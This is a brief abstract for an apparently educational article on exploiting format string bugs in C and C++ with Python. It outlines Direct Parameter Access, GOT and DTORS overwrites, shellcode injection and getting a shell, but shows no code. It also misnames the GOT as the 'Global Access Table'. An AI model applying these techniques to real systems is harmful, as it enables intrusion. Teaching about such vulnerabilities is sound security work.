This article is a follow-up and second part of a look at format strings in the C and C++ programming languages. In particular, how these may be abused. The article progresses to discuss crafting attacks using python in order to attack through DPA (Direct Parameter Access) such that you can enact a 4-byte overwrite in the DTORS and GOT (Global Access Table) and continues with exploiting the GOT and injecting shell code. We demonstrate how these simple but still often overlooked and even taught vulnerabilities can be used to read arbitrary locations from memory, write to memory and execute commands and finally to gain a shell.
Home » DPA Exploitation and GOTs With Python